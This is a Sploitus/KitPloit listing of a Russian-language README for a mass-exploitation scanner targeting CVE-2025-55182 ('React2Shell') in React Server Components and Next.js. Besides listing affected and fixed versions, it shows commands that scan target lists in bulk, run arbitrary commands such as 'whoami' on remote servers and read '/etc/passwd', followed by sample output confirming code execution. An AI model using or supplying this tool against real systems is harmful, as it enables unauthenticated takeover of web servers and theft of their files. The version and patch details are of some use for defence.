Sploitus

Exploit for CVE-2025-55182-Scanner

kitploit Β· 2026-09-01

Exploit Code

MARKDOWN170 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-QIXINLEE-CVE-2025-55182-SCANNER
# CVE-2025-55182 Π‘ΠΊΠ°Π½Π΅Ρ€ RCE

Π˜Π½ΡΡ‚Ρ€ΡƒΠΌΠ΅Π½Ρ‚ для массового обнаруТСния ΠΈ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ уязвимости ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠ΄Π° CVE-2025‑55182 (React2Shell).

> ⚠️ **ΠšΡ€ΠΈΡ‚ΠΈΡ‡Π΅ΡΠΊΠ°Ρ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ CVSS 10.0** | Π—Π°Ρ‚Ρ€Π°Π³ΠΈΠ²Π°Π΅Ρ‚ React Server Components ΠΈ Next.js 15.x/16.x | Волько для Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ тСстирования бСзопасности

## ОписаниС уязвимости

CVE-2025‑55182 (Ρ‚Π°ΠΊΠΆΠ΅ извСстная ΠΊΠ°ΠΊ Β«React2ShellΒ») – это **нСаутСнтифицированная ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠ΄Π° (RCE) с ΠΌΠ°ΠΊΡΠΈΠΌΠ°Π»ΡŒΠ½Ρ‹ΠΌ Ρ€Π΅ΠΉΡ‚ΠΈΠ½Π³ΠΎΠΌ CVSS 10.0**.

Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π²Ρ‹Π·Π²Π°Π½Π° нСбСзопасной дСсСриализациСй Π² ΠΏΠ°ΠΊΠ΅Ρ‚Π΅ `react-server` ΠΈΠ· состава React Server Components (RSC) ΠΏΡ€ΠΈ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ΅ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π° RSC Β«FlightΒ». Π—Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ сформированный HTTP‑запрос ΠΈ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ Π½Π° уязвимом сСрвСрС.

ΠŸΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ Next.js ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ» RSC Β«FlightΒ», Π΄Π°ΠΆΠ΅ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅, созданноС с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ `create-next-app` с настройками ΠΏΠΎ ΡƒΠΌΠΎΠ»Ρ‡Π°Π½ΠΈΡŽ, ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ Π°Ρ‚Π°ΠΊΠΎΠ²Π°Π½ΠΎ Π±Π΅Π· нСобходимости написания Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΎΠΌ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠ³ΠΎ ΠΊΠΎΠ΄Π°. Π‘ 5 дСкабря 2025 Π³ΠΎΠ΄Π° зафиксировано Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΠ΅ использованиС этой уязвимости.

### ΠŸΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Π½Ρ‹Π΅ вСрсии

**React Server Components:**

Имя ΠΏΠ°ΠΊΠ΅Ρ‚Π°| ΠŸΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Π½Ρ‹Π΅ вСрсии  
---|---  
react-server-dom-webpack| 19.0.0, 19.1.0, 19.1.1, 19.2.0  
react-server-dom-turbopack| 19.0.0, 19.1.0, 19.1.1, 19.2.0  
react-server-dom-parcel| 19.0.0, 19.1.0, 19.1.1, 19.2.0  
  
**Next.js (с App Router):**

**Π”Ρ€ΡƒΠ³ΠΈΠ΅ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ уязвимыС RSC‑фрСймворки/инструмСнты:**

  * react-router
  * waku
  * @parcel/rsc
  * @vitejs/plugin-rsc
  * rwsdk
  * RedwoodJS (Ρ€Π΅ΠΆΠΈΠΌ RSC)



### Π’Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Π΅ ΠΌΠ΅Ρ€Ρ‹ смягчСния

**⚠️ Π’Π°ΠΆΠ½ΠΎΠ΅ Π·Π°ΠΌΠ΅Ρ‡Π°Π½ΠΈΠ΅: для Π΄Π°Π½Π½ΠΎΠΉ уязвимости Π½Π΅Ρ‚ извСстных Π²Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Ρ… ΠΌΠ΅Ρ€ смягчСния; СдинствСнный способ исправлСния – ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠ΅ Π΄ΠΎ бСзопасной вСрсии.**

**Π Π΅ΠΊΠΎΠΌΠ΅Π½Π΄ΡƒΠ΅ΠΌΡ‹Π΅ вСрсии для обновлСния:**

  * **React:** ΠΎΠ±Π½ΠΎΠ²ΠΈΡ‚Π΅ΡΡŒ Π΄ΠΎ 19.0.1, 19.1.2 ΠΈΠ»ΠΈ 19.2.1
  * **Next.js:** ΠΎΠ±Π½ΠΎΠ²ΠΈΡ‚Π΅ΡΡŒ Π΄ΠΎ 16.0.7, 15.5.7, 15.4.8 ΠΈΠ»ΠΈ 15.3.6



_Π’Ρ‹ Ρ‚Π°ΠΊΠΆΠ΅ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ ΠΎΡ„ΠΈΡ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΉ npm‑пакСт`fix-react2shell-next` для ΠΏΠΎΠΌΠΎΡ‰ΠΈ Π² ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠΈ Π·Π°Ρ‚Ρ€ΠΎΠ½ΡƒΡ‚Ρ‹Ρ… ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΉ Next.js._

## Установка зависимостСй

root@kitploit:~
    
    
    pip install requests
    

## ИспользованиС

### Π‘Π°Π·ΠΎΠ²ΠΎΠ΅ использованиС

root@kitploit:~
    
    
    # МассовоС сканированиС (Ρ‡Ρ‚Π΅Π½ΠΈΠ΅ Ρ†Π΅Π»Π΅ΠΉ ΠΈΠ· urls.txt)
    python CVE-2025-55182.py -f urls.txt
    
    # ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° ΠΎΠ΄Π½ΠΎΠΉ Ρ†Π΅Π»ΠΈ
    python CVE-2025-55182.py -u http://192.168.1.100:3000
    

### ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠ°Ρ ΠΊΠΎΠΌΠ°Π½Π΄Π°

root@kitploit:~
    
    
    # Π’Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ whoami
    python CVE-2025-55182.py -f urls.txt -c "whoami"
    
    # Π’Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Ρƒ hostname
    python CVE-2025-55182.py -u http://target.com -c "hostname"
    
    # ΠŸΡ€ΠΎΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ Ρ„Π°ΠΉΠ»
    python CVE-2025-55182.py -f urls.txt -c "cat /etc/passwd"
    

### Π Π°ΡΡˆΠΈΡ€Π΅Π½Π½Ρ‹Π΅ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹

root@kitploit:~
    
    
    # Π£ΠΊΠ°Π·Π°Ρ‚ΡŒ количСство ΠΏΠΎΡ‚ΠΎΠΊΠΎΠ² ΠΈ Ρ‚Π°ΠΉΠΌΠ°ΡƒΡ‚
    python CVE-2025-55182.py -f urls.txt -t 50 --timeout 15
    
    # ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΠΉ Π²Ρ‹Ρ…ΠΎΠ΄Π½ΠΎΠΉ Ρ„Π°ΠΉΠ»
    python CVE-2025-55182.py -f urls.txt -o scan_results.csv
    
    # Π’ΠΈΡ…ΠΈΠΉ Ρ€Π΅ΠΆΠΈΠΌ (Π²Ρ‹Π²ΠΎΠ΄ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ уязвимых URL)
    python CVE-2025-55182.py -f urls.txt -q
    

## ОписаниС ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΎΠ²

## Π€ΠΎΡ€ΠΌΠ°Ρ‚ Ρ„Π°ΠΉΠ»Π° с URL

Один URL Π½Π° строку, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€:

root@kitploit:~
    
    
    http://192.168.1.10:3000
    http://192.168.1.11:3000
    

## ΠŸΡ€ΠΈΠΌΠ΅Ρ€ Π²Ρ‹Π²ΠΎΠ΄Π°

root@kitploit:~
    
    
        +---------------------------------------------------------------+
        |   ###   ## #######  ##  ## ########       ## #######          |
        |   ####  ## ##       ## ##     ##          ## ##               |
        |   ## ## ## #####     ###      ##          ## #######          |
        |   ##  #### ##       ## ##     ##      ##  ##       ##         |
        |   ##   ### ####### ##   ##    ##       ####  #######          |
        |                                                               |
        |   CVE-2025-55182 RCE Scanner                                  |
        +---------------------------------------------------------------+
    
    ============================================================
      [ CONFIGURATION ]
    ============================================================
      > Targets: 10
      > Threads: 20
      > Command: id
    
    ============================================================
      [ SCANNING ]
    ============================================================
      [14:30:25] [VULN] http://192.168.1.10:3000
                 '--> uid=1000(www-data)
      [14:30:26] [SAFE] http://192.168.1.11:3000
    
    +==========================================================+
    |                     SCAN COMPLETE                        |
    +==========================================================+
    |  Total Targets :    10                                   |
    |  Vulnerable    :     1                                   |
    |  Safe          :     9                                   |
    |  Errors        :     0                                   |
    +==========================================================+
    

## Π’Ρ‹Ρ…ΠΎΠ΄Π½ΠΎΠΉ Ρ„Π°ΠΉΠ»

Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹ сканирования ΡΠΎΡ…Ρ€Π°Π½ΡΡŽΡ‚ΡΡ Π² Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅ CSV со ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌΠΈ полями:

  * `url` – Ρ†Π΅Π»Π΅Π²ΠΎΠΉ URL
  * `status` – HTTP‑статус
  * `vulnerable` – Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ уязвимости
  * `output` – Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹
  * `error` – сообщСниС ΠΎΠ± ошибкС



## ΠžΡ‚ΠΊΠ°Π· ΠΎΡ‚ отвСтствСнности

Π”Π°Π½Π½Ρ‹ΠΉ инструмСнт ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ для Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ тСстирования бСзопасности. НС ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠΉΡ‚Π΅ Π΅Π³ΠΎ Π² Π½Π΅Π·Π°ΠΊΠΎΠ½Π½Ρ‹Ρ… цСлях. ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ Π±Π΅Ρ€Ρ‘Ρ‚ Π½Π° сСбя всС связанныС риски.